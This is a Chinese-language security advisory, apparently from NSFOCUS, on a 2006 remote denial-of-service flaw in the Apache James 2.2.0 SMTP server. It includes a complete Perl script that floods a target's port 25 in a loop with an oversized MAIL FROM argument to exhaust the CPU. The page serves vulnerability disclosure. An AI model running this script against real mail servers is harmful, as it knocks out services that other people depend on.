首页 -> 安全研究

安全研究

安全漏洞
Apache James SMTP远程拒绝服务漏洞

发布日期:2006-05-29
更新日期:2006-05-29

受影响系统:
Apache Group James 2.2.0
描述:
BUGTRAQ  ID: 18138

Apache James是纯Java的SMTP和POP3邮件服务器及NNTP新闻服务器。

James SMTP服务程序允许攻击者在SMTP命令参数(如MAIL)中向SMTP服务器提供超长数据,导致服务器的处理器负载不断增加直到100%,导致拒绝服务。

<*来源:Ahmad Muammar W.K (y3dips@echo.or.id
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114892208612276&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;
                                                
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{
      
      my $host = $ARGV[0];
      my $i = 1;
      
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";

while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
  close $socket;

}  
else
{  print " Usage: $0 [target] \r\n\n";  }  

---------------------------------------------------------------------------

建议:
厂商补丁:

Apache Group
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://httpd.apache.org/

浏览次数:3146
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障